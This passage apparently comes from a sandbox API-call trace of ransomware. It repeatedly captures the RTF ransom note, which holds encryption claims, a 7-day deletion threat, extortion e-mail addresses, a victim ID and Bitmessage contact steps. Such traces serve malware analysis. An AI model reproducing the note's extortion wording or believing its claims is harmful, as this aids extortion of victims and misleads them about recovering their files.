by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 